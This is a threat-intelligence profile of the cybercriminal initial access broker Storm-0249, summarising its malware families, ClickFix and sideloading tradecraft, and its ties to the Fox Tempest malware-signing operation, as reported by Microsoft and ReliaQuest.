Storm-0249

Storm-0249 is a financially motivated cybercriminal threat actor tracked by Microsoft as an initial access broker active since 2021. The group is described as brokering network access to ransomware operators and supporting ransomware attacks. Microsoft states Storm-0249 is known for distributing BazaLoader, IcedID, Bumblebee, Emotet, Latrodectus, and in some campaigns BruteRatel C4 as part of delivery chains. Historically, Storm-0249 used large-scale phishing and email-based delivery, including tax-themed phishing campaigns and campaigns delivering Latrodectus or other initial access malware. Microsoft also linked Storm-0249 to use of the ClickFix methodology and reported that, beginning in March 2025, the actor shifted from email-based delivery to compromising legitimate websites, potentially through WordPress vulnerabilities, and using ClickFix to deliver payloads. Multiple sources in the content describe Storm-0249 as evolving from a noisy mass-phishing actor into a stealthier, more targeted initial access broker. The content states that Storm-0249 abuses trusted endpoint detection and response components and built-in Windows utilities to stealthily load malware, maintain persistence, and prepare victim environments for ransomware attacks. Reported tradecraft includes DLL sideloading using legitimate SentinelOne components, abuse of EDR processes, use of curl.exe and fileless PowerShell execution, and use of legitimate Windows utilities such as reg.exe and findstr.exe. ReliaQuest reporting in the content says Storm-0249 used ClickFix social engineering to convince victims to execute malicious commands via the Windows Run dialog, then deployed malicious MSI packages with SYSTEM privileges, dropped a trojanized DLL alongside a legitimate SentinelOne executable, established command-and-control, conducted reconnaissance, and extracted machine identifiers such as MachineGuid. The content also states Storm-0249 has used malvertising and large-scale phishing and has been associated with ClickFix campaigns alongside Storm-1607, Storm-0426, and Storm-1877. Microsoft linked Storm-0249 to Fox Tempest, a malware-signing-as-a-service operation that abused Microsoft Artifact Signing. According to the content, Storm-0249 was one of the threat actors that used Fox Tempest-signed malware in active intrusions and real-world attacks, including delivery through malvertising, SEO poisoning, and fake ads. The content also lists Storm-0249 among Fox Tempest customers alongside Vanilla Tempest, Storm-0501, and Storm-2561. No additional aliases or sub-groups for Storm-0249 are provided in the content beyond the name Storm-0249 itself.